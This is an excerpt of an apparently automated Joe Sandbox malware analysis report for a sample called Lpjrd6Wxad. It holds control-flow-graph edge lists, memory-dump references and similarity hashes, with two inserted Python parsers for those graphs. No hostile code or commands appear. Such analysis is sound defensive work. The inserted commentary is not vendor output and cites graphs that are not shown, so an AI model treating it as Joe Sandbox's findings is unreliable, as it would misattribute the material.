10271ef-10271f2 3247->3257 3258 10271cd-10271d3 3247->3258 3248->3247 3261 1027484-102748b 3248->3261 3249->3250 3251 1027521 3250->3251 3252 102751f 3250->3252 3254 1027523 3251->3254 3255 1027525 3251->3255 3252->3251 3254->3255 3259 1027527 3255->3259 3260 1027529-1027549 3255->3260 3265 10271f8-10271fb 3257->3265 3266 102734c-1027352 3257->3266 3262 10271d5 3258->3262 3263 10271dc-10271df 3258->3263 3259->3260 3277 1027552-1027556 3260->3277 3278 102754b-1027550 3260->3278 3261->3239 3264 102748d-102748f 3261->3264 3262->3263 3262->3266 3267 1027212-1027218 3262->3267 3268 102743e-1027441 3262->3268 3263->3267 3269 10271e1-10271e4 3263->3269 3271 1027491-1027496 3264->3271 3272 102749e-10274a4 3264->3272 3265->3266 3274 1027201-1027207 3265->3274 3266->3268 3273 1027358-102735d 3266->3273 3281 102721a-102721c 3267->3281 3282 102721e-1027220 3267->3282 3283 1027447-102744d 3268->3283 3284 1027508 3268->3284 3275 10271ea 3269->3275 3276 102727e-1027284 3269->3276 3271->3272 3272->3242 3279 10274a6-10274ab 3272->3279 3273->3268 3274->3266 3280 102720d 3274->3280 3275->3268 3276->3268 3288 102728a-1027290 3276->3288 3285 102755c-102755d 3277->3285 3278->3285 3286 10274f0-10274f3 3279->3286 3287 10274ad-10274b2 3279->3287 3280->3268 3289 102722a-1027233 3281->3289 3282->3289 3290 1027472-1027476 3283->3290 3291 102744f-1027457 3283->3291 3284->3242 3286->3284 3295 10274f5-10274fa 3286->3295 3287->3284 3296 10274b4 3287->3296 3297 1027292-1027294 3288->3297 3298 1027296-1027298 3288->3298 3292 1027246-102726e 3289->3292 3293 1027235-1027240 3289->3293 3290->3261 3294 1027478-102747e 3290->3294 3291->3242 3299 102745d-102746c 3291->3299 3319 1027362-1027398 3292->3319 3320 1027274-1027279 3292->3320 3293->3268 3293->3292 3294->3240 3294->3261 3295->3239 3295->3264 3300 10274bb-10274c0 3296->3300 3301 10272a2-10272b9 3297->3301 3298->3301 3299->3247 3299->3290 3305 10274e2-10274e4 3300->3305 3306 10274c2-10274c4 3300->3306 3312 10272e4-102730b 3301->3312 3313 10272bb-10272d4 3301->3313 3305->3284 3308 10274e6-10274e9 3305->3308 3309 10274d3-10274d9 3306->3309 3310 10274c6-10274cb 3306->3310 3308->3286 3309->3242 3311 10274db-10274e0 3309->3311 3310->3309 3311->3305 3315 10274b6-10274b9 3311->3315 3312->3284 3325 1027311-1027314 3312->3325 3313->3319 3323 10272da-10272df 3313->3323 3315->3284 3315->3300 3326 10273a5-10273ad 3319->3326 3327 102739a-102739e 3319->3327 3320->3319 3323->3319 3325->3284 3328 102731a-1027343 3325->3328 3326->3284 3331 10273b3-10273b8 3326->3331 3329 10273a0-10273a3 3327->3329 3330 10273bd-10273c1 3327->3330 3328->3319 3343 1027345-102734a 3328->3343 3329->3326 3329->3330 3333 10273c3-10273c9 3330->3333 3334 10273e0-10273e4 3330->3334 3331->3268 3333->3334 3335 10273cb-10273d3 3333->3335 3336 10273e6-10273ec 3334->3336 3337 10273ee-102740d call 102791d 3334->3337 3335->3284 3339 10273d9-10273de 3335->3339 3336->3337 3340 1027413-1027417 3336->3340 3337->3340 3339->3268 3340->3268 3341 1027419-1027435 3340->3341 3341->3268 3343->3319 3345->3220 3346->3220 3347->3209 3348->3209 3349->3209
Memory Dump Source
• Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c82c4b4280789194e393dda6b8e36c6f279179a00d790c6e1dcf899881e68096
• Instruction ID: 9fe62b0f8b025bfcd44fb89dee9425fad39af430d1fafdbdb09a86733bd7334f
• Opcode Fuzzy Hash: c82c4b4280789194e393dda6b8e36c6f279179a00d790c6e1dcf899881e68096
• Instruction Fuzzy Hash: 70128030A00225DFCB55CF69C884AAEBBF2FF98300F6584A9E945EB261DB34DD45CB50

Control-flow Graph (legend: Executed / Not Executed)
control_flow_graph 3787 1023e12-1023e25 3788 1023e27-1023e29 3787->3788 3789 1023e2e-1023e3e 3787->3789 3790 10240cc-10240d3 3788->3790 3791 1023e40 3789->3791 3792 1023e45-1023e55 3789->3792 3791->3790 3794 10240b3-10240c1 3792->3794 3795 1023e5b-1023e69 3792->3795 3798 10240d4-1024152 3794->3798 3800 10240c3-10240c7 call 10202c8 3794->3800 3795->3798 3799 1023e6f 3795->3799 3799->3798 3801 1023f00-1023f21 3799->3801 3802 1023f26-1023f47 3799->3802 3803 1024067-1024082 call 10202d8 3799->3803 3804 10240a7-10240b1 3799->3804 3805 1024084-10240a5 call 10228f0 3799->3805 3806 102400e-1024034 3799->3806 3807 1023f4c-1023f6d 3799->3807 3808 1023fcc-1024009 3799->3808 3809 1023e8d-1023eae 3799->3809 3810 1023f72-1023f9a 3799->3810 3811 1023eb3-1023ed5 3799->3811 3812 1023e76-1023e88 3799->3812 3813 1023eda-1023efb 3799->3813 3814 1024039-1024065 3799->3814 3815 1023f9f-1023fc7 3799->3815 3800->3790 3801->3790 3802->3790 3803->3790 3804->3790 3805->3790 3806->3790 3807->3790 3808->3790 3809->3790 3810->3790 3811->3790 3812->3790 3813->3790 3814->3790 3815->3790
Memory Dump Source
• Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c9a22ebe34882a3387a6e83f7c6696a5d45886de3a3c7a01b00d8927ce72b739
• Instruction ID: f5c17ba316014793168f61fd1d1e60b7d61cad5dd4f67e59501c5298fb47a662
• Opcode Fuzzy Hash: c9a22ebe34882a3387a6e83f7c6696a5d45886de3a3c7a01b00d8927ce72b739
• Instruction Fuzzy Hash: 7591C870B04219DFDB08AFB4D89427E77B3BFC9B00B158A6EE442E7294DE35D8069791

Control-flow Graph (legend: Executed / Not Executed)
control_flow_graph 3869 102c147-102c158 3870 102c184 3869->3870 3871 102c15a-102c15e 3869->3871 3873 102c186-102c18a 3870->3873 3872 102c15f-102c160 3871->3872 3874 102c163-102c166 3872->3874 3876 102c167-102c172 3874->3876 3878 102c174-102c179 3876->3878 3879 102c17b-102c17e 3876->3879 3878->3873 3880 102c180-102c182 3879->3880 3881 102c18b-102c199 3879->3881 3880->3870 3880->3871 3881->3872 3883 102c19b-102c19d 3881->3883 3883->3874 3884 102c19f-102c1a1 3883->3884 3884->3876 3885 102c1a3-102c1c8 3884->3885 3886 102c1ca 3885->3886 3887 102c1cf-102c2ac call 10241a0 call 1023cc0 3885->3887 3886->3887 3897 102c2b3-102c2d4 call 1025658 3887->3897 3898 102c2ae 3887->3898 3900 102c2d9-102c2e4 3897->3900 3898->3897 3901 102c2e6 3900->3901 3902 102c2eb-102c2ef 3900->3902 3901->3902 3903 102c2f1-102c2f2 3902->3903 3904 102c2f4-102c2fb 3902->3904 3905 102c313-102c357 3903->3905 3906 102c302-102c310 3904->3906 3907 102c2fd 3904->3907 3911 102c3bd-102c3d4 3905->3911 3906->3905 3907->3906 3913 102c3d6-102c3fb 3911->3913 3914 102c359-102c36f 3911->3914 3921 102c413 3913->3921 3922 102c3fd-102c412 3913->3922 3918 102c371-102c37d 3914->3918 3919 102c399 3914->3919 3923 102c387-102c38d 3918->3923 3924 102c37f-102c385 3918->3924 3920 102c39f-102c3bc 3919->3920 3920->3911 3922->3921 3925 102c397 3923->3925 3924->3925 3925->3920
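The four control-flow graphs above are exported as plain edge lists rather than as the rendered picture: a basic block appears as "<id> <start>-<end>" (or a single address for a one-instruction block), an edge as "<id>-><id>", and a block may carry a "call <addr>" or a bare API name such as LdrInitializeThunk. Two things worth noticing when reading them by hand: in the 5828aa8 function, block 1095 (58290f0-5829151) calls 5828aa8, the function's own entry, and in the 1026fc8 function three nodes share the address 1027000 with different call targets, which is how the listing records a call site with more than one resolved target. The following parser is an added example, not code from Joe Sandbox or from the report; the token grammar is inferred from the listing, and the sample input is a constructed excerpt that borrows block numbers and addresses from the 5828aa8 graph but uses a small made-up edge subset (with one block deliberately left without a predecessor), not the full graph.

```python
"""Parse a Joe Sandbox "control_flow_graph" edge list (the text form shown
in the report, not the rendered image) and summarise it for triage.

Added example, not part of Joe Sandbox or the report. Token grammar
inferred from the listing: "<id> <start>[-<end>]" defines a basic block,
"<id>-><id>" is an edge, "call <addr>" and bare API names annotate the
most recently defined block.
"""
import re
from collections import defaultdict

# Constructed sample in the same format as the report's graph lines. Block
# numbers and addresses are borrowed from the 5828aa8 listing, but the edge
# set is a small constructed subset, not the real graph, and block 1099 is
# given no predecessor on purpose to exercise the reachability check.
CFG_TEXT = (
    "control_flow_graph "
    "972 5828aa8-5828ab8 973 5828aba 972->973 974 5828abf-5828acb 972->974 "
    "975 5828beb-5828bf5 973->975 977 5828ad2-5828ae7 974->977 "
    "1076 58291ce-58291e2 977->1076 "
    "1080 58291e9-58291ff LdrInitializeThunk 1076->1080 "
    "1095 58290f0-5829151 call 5828aa8 1080->1095 1095->975 "
    "1099 5829300-5829305 1099->975"
)

NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")
EDGE = re.compile(r"^(\d+)->(\d+)$")


def parse_cfg(text):
    """Return (blocks, edges): blocks maps id -> {addr, calls, apis},
    edges maps id -> set of successor ids."""
    tokens = text.split()
    blocks = {}
    edges = defaultdict(set)
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges[int(m.group(1))].add(int(m.group(2)))
            i += 1
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            # A block definition is always an id followed by its address range,
            # so the pair is consumed together; an address that happens to be
            # all digits (e.g. 1027000) is therefore never mistaken for an id.
            current = int(tok)
            blocks[current] = {"addr": tokens[i + 1], "calls": [], "apis": []}
            i += 2
        elif tok == "call" and current is not None and i + 1 < len(tokens):
            blocks[current]["calls"].append(tokens[i + 1])
            i += 2
        else:
            # Anything else (e.g. LdrInitializeThunk) is an API annotation on
            # the current block; the leading "control_flow_graph" label is
            # skipped because no block has been defined yet.
            if current is not None and tok != "control_flow_graph":
                blocks[current]["apis"].append(tok)
            i += 1
    return blocks, edges


def reachable(edges, entry):
    """Depth-first walk from entry over the successor sets."""
    seen, stack = set(), [entry]
    while stack:
        n = stack.pop()
        if n not in seen:
            seen.add(n)
            stack.extend(edges.get(n, ()))
    return seen


def summarize(text):
    blocks, edges = parse_cfg(text)
    entry = next(iter(blocks))  # the first block listed is the entry block
    entry_addr = blocks[entry]["addr"].split("-")[0]
    reach = reachable(edges, entry)
    calls = [(b["addr"], t) for b in blocks.values() for t in b["calls"]]
    apis = [(b["addr"], a) for b in blocks.values() for a in b["apis"]]
    return {
        "entry": entry_addr,
        "blocks": len(blocks),
        # blocks the listing contains but that no path from the entry reaches
        "unreachable": sorted(b["addr"] for n, b in blocks.items() if n not in reach),
        "calls": calls,
        "apis": apis,
        # a call whose target is the function's own entry address
        "recursive": any(t == entry_addr for _, t in calls),
    }


if __name__ == "__main__":
    for key, value in summarize(CFG_TEXT).items():
        print(f"{key}: {value}")
```

Pasting one of the report's full "control_flow_graph ..." lines into summarize() gives the entry address, the block count, every call target and API reference with the block it sits in, and whether any call targets the entry address. For the 1026fc8 graph the three call targets listed at 1027000 come out as three separate entries, one of them 1026fc8 itself.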
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 79bf516f9a4e9ce09b8dc792e18eee37f73338fd5e90e78db6d93379d09d3dc6
                                                                                                                                              • Instruction ID: e9fd5d00c3293dd2568bc38ec3adc66d1e485130fc9f8b741d04ea6bbda1d1f2
                                                                                                                                              • Opcode Fuzzy Hash: 79bf516f9a4e9ce09b8dc792e18eee37f73338fd5e90e78db6d93379d09d3dc6
                                                                                                                                              • Instruction Fuzzy Hash: 10A1F774E00258CFEB54DFA9D984A9DBBF2BF89300F1480AAE449EB365DB319945CF50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: af7fcde227234e75220993863e8becff9656ae6b14da8cb4720565e7f3d7bcf2
                                                                                                                                              • Instruction ID: 37c682d6315234bdefe21eba969091c4f9003ab09176719fa8dea2d62708f967
                                                                                                                                              • Opcode Fuzzy Hash: af7fcde227234e75220993863e8becff9656ae6b14da8cb4720565e7f3d7bcf2
                                                                                                                                              • Instruction Fuzzy Hash: BC81B474E00218CFEB54DFA9D984A9DFBF2BF88300F148069E859AB365DB345945CF51
Memory Dump Source
• Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
Memory Dump Source
• Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
Memory Dump Source
• Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
Memory Dump Source
• Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
Memory Dump Source
• Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
Memory Dump Source
• Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
Memory Dump Source
• Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
Memory Dump Source
• Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd

Control-flow Graph
• Rendered basic-block graph not reproduced here (legend: Executed / Not Executed)
APIs
• LdrInitializeThunk.NTDLL(00000000), ref: 058291EE
Memory Dump Source
• Source File: 00000000.00000002.4037774321.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5820000_Lpjrd6Wxad.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

Control-flow Graph
• Rendered basic-block graph not reproduced here (legend: Executed / Not Executed)
Memory Dump Source
• Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd

Control-flow Graph
• Rendered basic-block graph not reproduced here (legend: Executed / Not Executed)
Memory Dump Source
• Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 2227 1028490-102871d 2266 1028727-102897e 2227->2266 2302 1028ed0-1028ef3 2266->2302 2303 1028984-1028994 2266->2303 2303->2302 2304 102899a-10289aa 2303->2304 2304->2302 2306 10289b0-10289c0 2304->2306 2306->2302 2307 10289c6-10289d6 2306->2307 2307->2302 2308 10289dc-10289ec 2307->2308 2308->2302 2309 10289f2-1028a02 2308->2309 2309->2302 2310 1028a08-1028a18 2309->2310 2310->2302 2311 1028a1e-1028a2e 2310->2311 2311->2302 2312 1028a34-1028a44 2311->2312 2312->2302 2313 1028a4a-1028a5a 2312->2313 2313->2302 2314 1028a60-1028ecf 2313->2314
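The `control_flow_graph` line above is the text form of the rendered graph: a decimal block id followed by the block's address (or `start-end` range), then `call <addr>` for each callee reached from that block, with `* N` when the same callee is invoked N times, and `src->dst` edges between block ids. The parser below is an added example and is not code from this report or from Joe Sandbox; it reads that format into blocks, edges and call sites and derives the entry and exit blocks, each block's in-degree and the per-callee call counts. The two sample dumps are copied from this report (the function at 0x1028490 directly above and the first blocks of the function at 0x1020c93 further down); the token rules are inferred from those dumps, not taken from a published specification.

```python
"""Parse Joe Sandbox 'control_flow_graph' text dumps into blocks, edges and call sites.

Added example for this report; the grammar is inferred from the dumps on the page.
"""
import re
from dataclasses import dataclass, field

# Token shapes seen in the dump: decimal block ids, hex addresses or hex ranges,
# 'src->dst' edges, 'call <addr>' and an optional '* N' repeat count after a call.
_ID = re.compile(r"^\d+$")
_ADDR = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")
_EDGE = re.compile(r"^(\d+)->(\d+)$")

# Copied from this report: the dump for the function at 0x1028490.
SAMPLE_GUARD_CHAIN = (
    "control_flow_graph 2227 1028490-102871d 2266 1028727-102897e 2227->2266 "
    "2302 1028ed0-1028ef3 2266->2302 2303 1028984-1028994 2266->2303 2303->2302 "
    "2304 102899a-10289aa 2303->2304 2304->2302 2306 10289b0-10289c0 2304->2306 "
    "2306->2302 2307 10289c6-10289d6 2306->2307 2307->2302 2308 10289dc-10289ec "
    "2307->2308 2308->2302 2309 10289f2-1028a02 2308->2309 2309->2302 "
    "2310 1028a08-1028a18 2309->2310 2310->2302 2311 1028a1e-1028a2e 2310->2311 "
    "2311->2302 2312 1028a34-1028a44 2311->2312 2312->2302 2313 1028a4a-1028a5a "
    "2312->2313 2313->2302 2314 1028a60-1028ecf 2313->2314"
)
# Copied from this report: the first blocks of the function at 0x1020c93.
SAMPLE_WITH_CALLS = (
    "control_flow_graph 2531 1020c93-1020cc0 2532 1020cc2 2531->2532 "
    "2533 1020cc7-1020cdd call 1020780 2531->2533 2532->2533 2536 1020ce2 "
    "2533->2536 2537 1020cee-102104e call 1020780 * 13 2536->2537"
)


@dataclass
class CFG:
    blocks: dict = field(default_factory=dict)  # block id -> (start, end) address
    edges: list = field(default_factory=list)   # (src_id, dst_id)
    calls: dict = field(default_factory=dict)   # block id -> [(callee, count), ...]


def parse_cfg(text: str) -> CFG:
    """Parse one whitespace-separated 'control_flow_graph ...' dump."""
    toks = text.split()
    if not toks or toks[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph dump")
    cfg, i, cur = CFG(), 1, None
    while i < len(toks):
        tok = toks[i]
        m = _EDGE.match(tok)
        if m:
            cfg.edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        if tok == "call" and cur is not None and i + 1 < len(toks):
            callee, count, i = int(toks[i + 1], 16), 1, i + 2
            if i + 1 < len(toks) and toks[i] == "*":   # 'call X * N' = N call sites
                count, i = int(toks[i + 1]), i + 2
            cfg.calls.setdefault(cur, []).append((callee, count))
            continue
        if _ID.match(tok) and i + 1 < len(toks):
            m = _ADDR.match(toks[i + 1])
            if m:  # a block id is always followed by its address or range
                cur = int(tok)
                start = int(m.group(1), 16)
                end = int(m.group(2), 16) if m.group(2) else start
                cfg.blocks[cur] = (start, end)
                i += 2
                continue
        raise ValueError(f"unexpected token {tok!r} at position {i}")
    return cfg


def entry_blocks(cfg: CFG) -> list:
    """Blocks with no incoming edge: the function entry (plus any unreachable stubs)."""
    targets = {dst for _, dst in cfg.edges}
    return sorted(b for b in cfg.blocks if b not in targets)


def exit_blocks(cfg: CFG) -> list:
    """Blocks with no outgoing edge: the function's return / bail-out blocks."""
    sources = {src for src, _ in cfg.edges}
    return sorted(b for b in cfg.blocks if b not in sources)


def in_degree(cfg: CFG, block: int) -> int:
    return sum(1 for _, dst in cfg.edges if dst == block)


def call_sites(cfg: CFG) -> dict:
    """Total number of call sites per callee address across the function."""
    totals = {}
    for sites in cfg.calls.values():
        for callee, count in sites:
            totals[callee] = totals.get(callee, 0) + count
    return totals


if __name__ == "__main__":
    g = parse_cfg(SAMPLE_GUARD_CHAIN)
    print(f"{len(g.blocks)} blocks, {len(g.edges)} edges, "
          f"entry {entry_blocks(g)}, exits {exit_blocks(g)}")
    hot = max(g.blocks, key=lambda b: in_degree(g, b))
    print(f"most-targeted block {hot} at {g.blocks[hot][0]:#x}, in-degree {in_degree(g, hot)}")
    c = parse_cfg(SAMPLE_WITH_CALLS)
    print({hex(t): n for t, n in call_sites(c).items()})
```

Run on the first sample, the parser reports fourteen blocks with a single entry (2227) and two exits, and block 2302 at 0x1028ed0 is the target of eleven of the twenty-three edges, a shape consistent with a run of checks that all share one bail-out path. On the second sample it resolves `call 1020780 * 13` plus the single earlier call into fourteen call sites for the one callee, which is the figure to compare against the disassembly when deciding whether a helper is a string decoder or similar hot routine.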
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6ae10f553d6e6c5ab04bdb0d06175c91143d1ebb70bb5d2a1aa3717e91e939b7
                                                                                                                                              • Instruction ID: 1c47097e9f35450cc6cf43f109ff8f64a60f4bd02eef663f69466afd3f7e6f06
                                                                                                                                              • Opcode Fuzzy Hash: 6ae10f553d6e6c5ab04bdb0d06175c91143d1ebb70bb5d2a1aa3717e91e939b7
                                                                                                                                              • Instruction Fuzzy Hash: 8042BE74A0021C8FEB14EBE4C860B9EBB77EF88700F1081A9D14A6B765DF355E85AF51

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 2379 102848f-102870d 2417 1028717-102871d 2379->2417 2418 1028727-102897e 2417->2418 2454 1028ed0-1028ef3 2418->2454 2455 1028984-1028994 2418->2455 2455->2454 2456 102899a-10289aa 2455->2456 2456->2454 2458 10289b0-10289c0 2456->2458 2458->2454 2459 10289c6-10289d6 2458->2459 2459->2454 2460 10289dc-10289ec 2459->2460 2460->2454 2461 10289f2-1028a02 2460->2461 2461->2454 2462 1028a08-1028a18 2461->2462 2462->2454 2463 1028a1e-1028a2e 2462->2463 2463->2454 2464 1028a34-1028a44 2463->2464 2464->2454 2465 1028a4a-1028a5a 2464->2465 2465->2454 2466 1028a60-1028ecf 2465->2466
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3e06ea679deda0b353dd20b0f4e9a8ffb4ea6b0aee0cab8e2fcc5c1620ad0a7c
                                                                                                                                              • Instruction ID: 023f203a06017f176f209eb9aaa21cf1d2a462a37c02f8d89dee266b9e4d2f68
                                                                                                                                              • Opcode Fuzzy Hash: 3e06ea679deda0b353dd20b0f4e9a8ffb4ea6b0aee0cab8e2fcc5c1620ad0a7c
                                                                                                                                              • Instruction Fuzzy Hash: C142AE74A0021C8FEB14EBE4C860B9EBA77EF88700F1081A9D14A6B765DF355E85AF51

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 2531 1020c93-1020cc0 2532 1020cc2 2531->2532 2533 1020cc7-1020cdd call 1020780 2531->2533 2532->2533 2536 1020ce2 2533->2536 2537 1020cee-102104e call 1020780 * 13 2536->2537 2611 1021056-102107d call 10227fb 2537->2611 2719 1021080 call 1023cc0 2611->2719 2720 1021080 call 1023cba 2611->2720 2614 1021086-102108f 2721 1021092 call 10241a0 2614->2721 2722 1021092 call 1024285 2614->2722 2615 1021098-10210c2 2618 10210cb 2615->2618 2725 10210ce call 1025362 2618->2725 2726 10210ce call 1025370 2618->2726 2619 10210d4-10210fe 2622 1021107-102110a call 102c147 2619->2622 2623 1021110-102113a 2622->2623 2626 1021143-1021146 call 102c46f 2623->2626 2627 102114c-1021176 2626->2627 2630 102117f-1021182 call 102c738 2627->2630 2631 1021188-10211b2 2630->2631 2634 10211bb-10211be call 102cd28 2631->2634 2635 10211c4-10211f7 2634->2635 2638 1021203-1021209 call 102cff7 2635->2638 2639 102120f-102124b 2638->2639 2642 1021257-102125d call 102d2c8 2639->2642 2643 1021263-102129f 2642->2643 2646 10212ab-10212b1 call 102d599 2643->2646 2647 10212b7-10213d2 2646->2647 2660 10213de-10213ea 2647->2660 2710 10213f0 call 1025362 2660->2710 2711 10213f0 call 1025370 2660->2711 2661 10213f6-102145c 2666 1021467-1021473 call 102d869 2661->2666 2667 1021479-1021485 2666->2667 2668 1021490-102149c call 102d869 2667->2668 2669 10214a2-10214ae 2668->2669 2670 10214b9-10214c5 call 102d869 2669->2670 2671 10214cb-10214d7 2670->2671 2672 10214e2-10214ee call 102d869 2671->2672 2673 10214f4-1021500 2672->2673 2674 102150b-1021517 call 102d869 2673->2674 2675 102151d-1021529 2674->2675 2676 1021534-1021540 call 102d869 2675->2676 2677 1021546-1021552 2676->2677 2678 102155d-1021569 call 102d869 2677->2678 2679 102156f-102158c 2678->2679 2681 1021597-10215a3 call 102d869 2679->2681 2682 10215a9-10215b5 2681->2682 2683 10215c0-10215cc call 
102d869 2682->2683 2684 10215d2-10215de 2683->2684 2685 10215e9-10215f5 call 102d869 2684->2685 2686 10215fb-1021607 2685->2686 2687 1021612-102161e call 102d869 2686->2687 2688 1021624-1021630 2687->2688 2689 102163b-1021647 call 102d869 2688->2689 2690 102164d-1021659 2689->2690 2691 1021664-1021670 call 102d869 2690->2691 2692 1021676-1021682 2691->2692 2693 102168d-1021699 call 102d869 2692->2693 2694 102169f-10216ab 2693->2694 2695 10216b6-10216c2 call 102d869 2694->2695 2696 10216c8-10216d4 2695->2696 2697 10216df-10216eb call 102d869 2696->2697 2698 10216f1-10217aa 2697->2698 2710->2661 2711->2661 2719->2614 2720->2614 2721->2615 2722->2615 2725->2619 2726->2619
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: db9e4b328eec19dc01463064686776525d78e0239e58c9b3ffb0f1063f135683
                                                                                                                                              • Instruction ID: 38a6feb178bb887aa7e35fd7e39924738acb9e061efc52875a6ed739b3c8e525
                                                                                                                                              • Opcode Fuzzy Hash: db9e4b328eec19dc01463064686776525d78e0239e58c9b3ffb0f1063f135683
                                                                                                                                              • Instruction Fuzzy Hash: C052E878901219CFCB54EF64ED94B9DBBB2FB88301F1086A9E409A7368DB305E95CF51

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 2740 1020ca0-1020cc0 2741 1020cc2 2740->2741 2742 1020cc7-102107d call 1020780 * 14 call 10227fb 2740->2742 2741->2742 2928 1021080 call 1023cc0 2742->2928 2929 1021080 call 1023cba 2742->2929 2823 1021086-102108f 2930 1021092 call 10241a0 2823->2930 2931 1021092 call 1024285 2823->2931 2824 1021098-10210cb 2934 10210ce call 1025362 2824->2934 2935 10210ce call 1025370 2824->2935 2828 10210d4-10213ea call 102c147 call 102c46f call 102c738 call 102cd28 call 102cff7 call 102d2c8 call 102d599 2919 10213f0 call 1025362 2828->2919 2920 10213f0 call 1025370 2828->2920 2870 10213f6-10216eb call 102d869 * 16 2907 10216f1-10217aa 2870->2907 2919->2870 2920->2870 2928->2823 2929->2823 2930->2824 2931->2824 2934->2828 2935->2828
                                                                                                                                              Memory Dump Source
